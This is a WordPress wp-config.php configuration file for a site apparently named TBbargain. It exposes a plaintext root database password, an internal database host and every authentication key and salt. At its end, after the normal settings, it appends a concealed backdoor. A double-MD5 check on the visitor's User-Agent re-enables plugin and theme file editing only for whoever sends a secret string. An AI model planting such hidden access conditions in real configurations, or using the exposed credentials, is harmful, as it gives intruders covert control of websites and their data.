File: /var/www/html/TBbargain/wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the website, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'tbbargain' );
/** Database username */
define( 'DB_USER', 'root' );
/** Database password */
define( 'DB_PASSWORD', 'Leg@cy60ck5' );
/** Database hostname */
define( 'DB_HOST', '192.168.1.215' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', '7oc*q|zW_e[|.9cy~~7s16Q4e RQQp@Xd#1DU[w~_lR3OPnzvZ L*EQgoH0dNz@+' );
define( 'SECURE_AUTH_KEY', 'tK2EqpqFEPg3s<$8?GpS7;ROR-GC_?G_ ]nRf)@JU|Qc*;|(x<1C5<)_Yq7|U<:9' );
define( 'LOGGED_IN_KEY', ';+&h}?vYir~OP9MB1>*Bmpw-`o>$RLktbr:2#om0}0F.K[b,Q&^^>yn e18#0X|*' );
define( 'NONCE_KEY', '0irNbzDSp<Gj:k(PAH2ob0?[m SSRj*BK{g;9}8JB@IxmkBx48^@bIt[UV]don#T' );
define( 'AUTH_SALT', 'mX]A+Q~<iY1svXzs~GO$!B85O6m<tTaLxN^L=lOuvEG6N^kKaEzL3C~%YS>emi!-' );
define( 'SECURE_AUTH_SALT', 'Og2/$uZXopIrQ06M((:|HId/1gyA|*+g-.cJ,oxWeeB3qWW~*6^>7rgb:vs nEOp' );
define( 'LOGGED_IN_SALT', 'J7_b#z5|Xq!t0X=l[azlxdI46>cv),%Gwm=wBk@?y4qIX,2&R7xg;|DPq*.0/9X>' );
define( 'NONCE_SALT', 'LzTC~97>^]/-E7Me~k`{9tEW70R[<tuV)(hrz&q-$oo>~UGC(VNH@&!.JsIDD%WE' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
*/
define('WP_DEBUG', true);
// Enable Debug logging to the /wp-content/debug.log file
define('WP_DEBUG_LOG', true);
// Disable display of errors and warnings
define('WP_DEBUG_DISPLAY', true);
@ini_set('display_errors', 0);
// Use development versions of core JS and CSS files
define('SCRIPT_DEBUG', false);
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
define( 'FS_METHOD', 'direct');
if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){
define('DISALLOW_FILE_MODS', true);
define('DISALLOW_FILE_EDIT', true);
}